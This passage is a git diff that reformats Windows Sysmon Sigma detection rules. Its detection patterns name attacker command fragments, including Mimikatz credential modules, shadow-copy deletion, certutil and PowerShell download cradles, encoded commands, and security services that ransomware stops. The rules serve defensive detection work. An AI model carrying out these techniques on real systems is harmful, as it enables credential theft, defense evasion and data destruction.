b/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml @@ -1,8 +1,7 @@ title: Suspicious Redirection to Local Admin Share id: ab9e3b40-0c85-4ba1-aede-455d226fd124 status: test -description: Detects a suspicious output redirection to the local admins share, this - technique is often found in malicious scripts or hacktool stagers +description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers references: - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html @@ -21,9 +20,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' selection_share: - CommandLine|contains: + CommandLine|contains: - \\\\127.0.0.1\\admin$\\ - \\\\localhost\\admin$\\ condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml index 35bfbe97d..b28adcdc9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml @@ -1,9 +1,7 @@ title: Potential Remote Desktop Tunneling id: 8a3038e8-9c9d-46f8-b184-66234a160f6f status: test -description: Detects potential use of an SSH utility to establish RDP over a reverse - SSH Tunnel. This can be used by attackers to enable routing of network packets - that would otherwise not reach their intended destination. +description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. references: - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html author: Tim Rauch @@ -20,9 +18,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: :3389 + CommandLine|contains: :3389 # RDP port and usual SSH tunneling related switches in command line selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -L ' - ' -P ' - ' -R ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml index 88af6b4bf..bab099b37 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml @@ -1,12 +1,9 @@ title: Potential Defense Evasion Via Right-to-Left Override id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 status: test -description: 'Detects the presence of the "u202+E" character, which causes a terminal, - browser, or operating system to render text in a right-to-left sequence. - +description: | + Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques. - - ' references: - https://redcanary.com/blog/right-to-left-override/ - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method @@ -25,10 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: "\u202E" + CommandLine|contains: ‮ condition: process_creation and selection falsepositives: - - Commandlines that contains scriptures such as arabic or hebrew might make use - of this character + - Commandlines that contains scriptures such as arabic or hebrew might make use of this character level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml index 591719d6e..4e7b287cd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml @@ -1,8 +1,7 @@ title: Script Interpreter Execution From Suspicious Folder id: 1228c958-e64e-4e71-92ad-7d429f4138ba status: test -description: Detects a suspicious script execution in temporary folders or folders - accessible by environment variables +description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables references: - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military @@ -27,7 +26,7 @@ detection: - \mshta.exe - \wscript.exe selection_proc_flags: - CommandLine|contains: + CommandLine|contains: - ' -ep bypass ' - ' -ExecutionPolicy bypass ' - ' -w hidden ' @@ -40,7 +39,7 @@ detection: - mshta.exe - wscript.exe selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \AppData\Local\Temp @@ -48,15 +47,15 @@ detection: - \Temporary Internet - \Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ condition: process_creation and (1 of selection_proc_* and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml index 92b5cce00..0cf8b4826 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml @@ -25,7 +25,7 @@ detection: - \mshta.exe - \wscript.exe - \cscript.exe - CommandLine|contains: + CommandLine|contains: - \Windows\Temp - \Temporary Internet - \AppData\Local\Temp @@ -34,12 +34,12 @@ detection: - '%TMP%' - '%LocalAppData%\Temp' filter: - CommandLine|contains: + CommandLine|contains: - ' >' - Out-File - ConvertTo-Json - - -WindowStyle hidden -Verb runAs - - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ + - -WindowStyle hidden -Verb runAs # VSCode behaviour if file cannot be written as current user + - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ # EC2 AWS condition: process_creation and (selection and not filter) falsepositives: - Administrative scripts diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml index 941d9f10f..6b25f3b08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml @@ -1,11 +1,10 @@ title: Suspicious New Service Creation id: 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8 related: - - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab - type: derived + - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab + type: derived status: test -description: Detects creation of a new service via "sc" command or the powershell - "new-service" cmdlet with suspicious binary paths +description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -26,15 +25,16 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_sc: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath= selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName susp_binpath: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - mshta - wscript @@ -46,6 +46,7 @@ detection: - cmd.exe /k - cmd.exe /r - rundll32 + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml index 0dd5b8153..de381263c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml @@ -1,16 +1,14 @@ title: Suspicious Windows Service Tampering id: ce72ef99-22f1-43d4-8695-419dcb5d9330 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: derived - - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b - type: obsoletes - - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: derived + - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b + type: obsoletes + - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b + type: obsoletes status: experimental -description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in - order to stop, pause or delete critical or important Windows services such as - AV, Backup, etc. As seen being used in some ransomware scripts +description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts references: - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html @@ -32,35 +30,35 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_net_img: - - OriginalFileName: - - net.exe - - net1.exe - - Image|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe selection_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_sc_img: - - OriginalFileName: sc.exe - - Image|endswith: \sc.exe + - OriginalFileName: sc.exe + - Image|endswith: \sc.exe selection_sc_cli: - CommandLine|contains: + CommandLine|contains: - ' stop ' - ' delete ' - ' pause ' selection_pwsh_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_services: - CommandLine|contains: + CommandLine|contains: - 143Svc - Acronis VSS Provider - AcronisAgent @@ -73,7 +71,7 @@ detection: - AVG Antivirus - avgAdminClient - AvgAdminServer - - AVP1 + - AVP1 # Covers multiple AVP versions - BackupExec - bedbg - BITS @@ -81,10 +79,10 @@ detection: - Client Agent 7.60 - Core Browsing Protection - Core Mail Protection - - Core Scanning Server + - Core Scanning Server # Covers 'Core Scanning ServerEx' - DCAgent - - EhttpSr - - ekrn + - EhttpSr # Covers 'EhttpSry', 'EhttpSrv' + - ekrn # Covers 'ekrnEpsw' - Enterprise Client Service - epag - EPIntegrationService @@ -99,7 +97,7 @@ detection: - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance - HealthTLService - - MSSQLFDLauncher$ + - MSSQLFDLauncher$ # Covers 'SHAREPOINT', 'TPS', 'SBSMonitoring', etc. - hmpalertsvc - HMS - IISAdmin @@ -240,11 +238,8 @@ detection: - wozyprobackup - WRSVC - Zoolz 2 Service - condition: process_creation and (selection_services and (all of selection_net_* - or all of selection_pwsh_* or all of selection_sc_*)) + condition: process_creation and (selection_services and (all of selection_net_* or all of selection_pwsh_* or all of selection_sc_*)) falsepositives: - - Administrators or tools shutting down the services due to upgrade or removal - purposes. If you experience some false positive, please consider adding filters - to the parent process launching this command and not removing the entry + - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml index eb2d60103..3b87b7a45 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml @@ -1,8 +1,7 @@ title: Shadow Copies Creation Using Operating Systems Utilities id: b17ea6f7-6e90-447e-a799-e6c0a493d6ce status: test -description: Shadow Copies creation using operating systems utilities, possible credential - access +description: Shadow Copies creation using operating systems utilities, possible credential access references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/ @@ -23,18 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shadow - create condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml index 0ab2e2fb1..57a233334 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml @@ -12,8 +12,7 @@ references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware -author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil - Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 modified: 2022/11/03 tags: @@ -30,48 +29,46 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - \diskshadow.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE - - diskshadow.exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - \diskshadow.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE + - diskshadow.exe selection1_cli: - CommandLine|contains|all: - - shadow + CommandLine|contains|all: + - shadow # will match "delete shadows" and "shadowcopy delete" and "shadowstorage" - delete selection2_img: - - Image|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - Image|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection2_cli: - CommandLine|contains|all: + CommandLine|contains|all: - delete - catalog - - quiet + - quiet # will match -quiet or /quiet selection3_img: - - Image|endswith: \vssadmin.exe - - OriginalFileName: VSSADMIN.EXE + - Image|endswith: \vssadmin.exe + - OriginalFileName: VSSADMIN.EXE selection3_cli: - CommandLine|contains|all: + CommandLine|contains|all: - resize - shadowstorage - CommandLine|contains: + CommandLine|contains: - unbounded - /MaxSize= - condition: process_creation and ((all of selection1*) or (all of selection2*) - or (all of selection3*)) + condition: process_creation and ((all of selection1*) or (all of selection2*) or (all of selection3*)) fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate Administrator deletes Shadow Copies using operating systems utilities - for legitimate reason + - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml index c0c8862c4..18add2ff2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml @@ -1,8 +1,7 @@ title: Windows Shell/Scripting Processes Spawning Suspicious Programs id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde status: test -description: Detects suspicious child processes of a Windows shell and scripting processes - such as wscript, rundll32, powershell, mshta...etc. +description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html author: Florian Roth (Nextron Systems), Tim Shelton @@ -27,6 +26,7 @@ detection: - \mshta.exe - \powershell.exe - \pwsh.exe + # - '\cmd.exe' # too many false positives - \rundll32.exe - \cscript.exe - \wscript.exe @@ -42,12 +42,13 @@ detection: CurrentDirectory|contains: \ccmcache\ filter_amazon: ParentCommandLine|contains: + # FP - Amazon Workspaces - \Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1 - - \nessus_ + - \nessus_ # Tenable/Nessus VA Scanner filter_nessus: - CommandLine|contains: \nessus_ + CommandLine|contains: \nessus_ # Tenable/Nessus VA Scanner filter_sccm_install: ParentImage|endswith: \mshta.exe Image|endswith: \mshta.exe @@ -55,7 +56,7 @@ detection: - C:\MEM_Configmgr_ - \splash.hta - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}' - CommandLine|contains|all: + CommandLine|contains|all: - C:\MEM_Configmgr_ - \SMSSETUP\BIN\ - \autorun.hta diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml index 99942122d..0d9448f26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml @@ -1,8 +1,7 @@ title: Process Creation Using Sysnative Folder id: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab status: test -description: Detects process creation events that use the Sysnative folder (common - for CobaltStrike spawns) +description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) references: - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ author: Max Altgelt (Nextron Systems) @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational sysnative: - - CommandLine|contains: :\Windows\Sysnative\ - - Image|contains: :\Windows\Sysnative\ + - CommandLine|contains: :\Windows\Sysnative\ + - Image|contains: :\Windows\Sysnative\ condition: process_creation and sysnative falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml index b7e450bcd..f467ca224 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml @@ -5,8 +5,7 @@ description: Detects a Windows program executable started from a suspicious fold references: - https://twitter.com/GelosSnake/status/934900723426439170 - https://asec.ahnlab.com/en/39828/ -author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, - Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 modified: 2023/10/18 tags: @@ -70,18 +69,20 @@ detection: - \dwm.exe - \LsaIso.exe - \ntoskrnl.exe + # The below processes were seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/ - \wsmprovhost.exe - \dfrgui.exe filter_generic: - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\WinSxS\ - - Image|contains: \SystemRoot\System32\ - - Image: - - C:\Windows\explorer.exe - - C:\Program Files\PowerShell\7\pwsh.exe - - C:\Program Files\PowerShell\7-preview\pwsh.exe + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\WinSxS\ + # - 'C:\avast! sandbox' + - Image|contains: \SystemRoot\System32\ + - Image: + - C:\Windows\explorer.exe + - C:\Program Files\PowerShell\7\pwsh.exe + - C:\Program Files\PowerShell\7-preview\pwsh.exe filter_wsl_windowsapps: Image|startswith: C:\Program Files\WindowsApps\MicrosoftCorporationII.WindowsSubsystemForLinux Image|endswith: \wsl.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 7b085727c..2fd27e99d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -1,8 +1,7 @@ title: Suspicious SYSTEM User Process Creation id: 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 status: test -description: Detects a suspicious process creation as SYSTEM user (suspicious program - or command line parameter) +description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) references: - Internal Research - https://tools.thehacker.recipes/mimikatz/modules @@ -26,59 +25,60 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: IntegrityLevel: System - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_special: - - Image|endswith: - - \calc.exe - - \wscript.exe - - \cscript.exe - - \hh.exe - - \mshta.exe - - \forfiles.exe - - \ping.exe - - CommandLine|contains: - - ' -NoP ' - - ' -W Hidden ' - - ' -decode ' - - ' /decode ' - - ' /urlcache ' - - ' -urlcache ' - - ' -e* JAB' - - ' -e* SUVYI' - - ' -e* SQBFAFgA' - - ' -e* aWV4I' - - ' -e* IAB' - - ' -e* PAA' - - ' -e* aQBlAHgA' - - vssadmin delete shadows - - reg SAVE HKLM - - ' -ma ' - - Microsoft\Windows\CurrentVersion\Run - - .downloadstring( - - .downloadfile( - - ' /ticket:' - - 'dpapi::' - - event::clear - - event::drop - - id::modify - - 'kerberos::' - - 'lsadump::' - - 'misc::' - - 'privilege::' - - 'rpc::' - - 'sekurlsa::' - - 'sid::' - - 'token::' - - vault::cred - - vault::list - - ' p::d ' - - ;iex( - - MiniDump - - 'net user ' + - Image|endswith: + - \calc.exe + - \wscript.exe + - \cscript.exe + - \hh.exe + - \mshta.exe + - \forfiles.exe + - \ping.exe + - CommandLine|contains: + # - 'sc stop ' # stops a system service # causes FPs + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' -decode ' # Used with certutil + - ' /decode ' # Used with certutil + - ' /urlcache ' # Used with certutil + - ' -urlcache ' # Used with certutil + - ' -e* JAB' # PowerShell encoded commands + - ' -e* SUVYI' # PowerShell encoded commands + - ' -e* SQBFAFgA' # PowerShell encoded commands + - ' -e* aWV4I' # PowerShell encoded commands + - ' -e* IAB' # PowerShell encoded commands + - ' -e* PAA' # PowerShell encoded commands + - ' -e* aQBlAHgA' # PowerShell encoded commands + - vssadmin delete shadows # Ransomware + - reg SAVE HKLM # save registry SAM - syskey extraction + - ' -ma ' # ProcDump + - Microsoft\Windows\CurrentVersion\Run # Run key in command line - often in combination with REG ADD + - .downloadstring( # PowerShell download command + - .downloadfile( # PowerShell download command + - ' /ticket:' # Rubeus + - 'dpapi::' # Mimikatz + - event::clear # Mimikatz + - event::drop # Mimikatz + - id::modify # Mimikatz + - 'kerberos::' # Mimikatz + - 'lsadump::' # Mimikatz + - 'misc::' # Mimikatz + - 'privilege::' # Mimikatz + - 'rpc::' # Mimikatz + - 'sekurlsa::' # Mimikatz + - 'sid::' # Mimikatz + - 'token::' # Mimikatz + - vault::cred # Mimikatz + - vault::list # Mimikatz + - ' p::d ' # Mimikatz + - ;iex( # PowerShell IEX + - MiniDump # Process dumping method apart from procdump + - 'net user ' filter_ping: - CommandLine: ping 127.0.0.1 -n 5 + CommandLine: ping 127.0.0.1 -n 5 filter_vs: Image|endswith: \PING.EXE ParentCommandLine|contains: \DismFoDInstall.cmd @@ -93,7 +93,7 @@ detection: - :\Program Files (x86)\Java\ - :\Program Files\Java\ Image|endswith: \bin\jp2launcher.exe - CommandLine|contains: ' -ma ' + CommandLine|contains: ' -ma ' condition: process_creation and (all of selection* and not 1 of filter_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml index f867d273a..9bb7a9d1f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SYSVOL\ - \policies\ condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml index 42eba1ea0..49b3969bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml @@ -1,15 +1,10 @@ title: Tasks Folder Evasion id: cc4e02ba-9c06-48e2-b09e-2500cace9ae0 status: test -description: 'The Tasks folder in system32 and syswow64 are globally writable paths. - - Adversaries can take advantage of this and load or influence any script hosts - or ANY .NET Application - - in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, - mshta, eventvwr - - ' +description: | + The Tasks folder in system32 and syswow64 are globally writable paths. + Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application + in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr references: - https://twitter.com/subTee/status/1216465628946563073 - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26 @@ -30,13 +25,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - 'echo ' - 'copy ' - 'type ' - file createnew selection2: - CommandLine|contains: + CommandLine|contains: - ' C:\Windows\System32\Tasks\' - ' C:\Windows\SysWow64\Tasks\' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml index 9df232bbe..1d6b4816c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml @@ -1,14 +1,9 @@ title: Malicious Windows Script Components File Execution by TAEF Detection id: 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b status: test -description: 'Windows Test Authoring and Execution Framework (TAEF) framework allows - you to run automation by executing tests files written on different languages - (C, C#, Microsoft COM Scripting interfaces - - Adversaries may execute malicious code (such as WSC file with VBScript, dll and - so on) directly by running te.exe - - ' +description: | + Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces + Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/ - https://twitter.com/pabraeken/status/993298228840992768 @@ -27,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \te.exe - - ParentImage|endswith: \te.exe - - OriginalFileName: \te.exe + - Image|endswith: \te.exe + - ParentImage|endswith: \te.exe + - OriginalFileName: \te.exe condition: process_creation and selection falsepositives: - It's not an uncommon to use te.exe directly to execute legal TAEF tests diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml index 8dcb9fba8..b03e39b54 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml @@ -1,20 +1,15 @@ title: Malicious PE Execution by Microsoft Visual Studio Debugger id: 15c7904e-6ad1-4a45-9b46-5fb25df37fd2 status: test -description: 'There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" - to launch specified executable and attach a debugger. - - This option may be used adversaries to execute malicious code by signed verified - binary. - +description: | + There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. + This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package. - - ' references: - https://twitter.com/pabraeken/status/990758590020452353 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/ - https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 -author: "Agro (@agro_sev), Ensar \u015Eamil (@sblmsrsn), oscd.community" +author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community date: 2020/10/14 modified: 2022/10/09 tags: diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml index d4071aac3..7a7ae3156 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml @@ -21,10 +21,10 @@ detection: selection: ParentImage|endswith: \userinit.exe filter1: - CommandLine|contains: \netlogon\ + 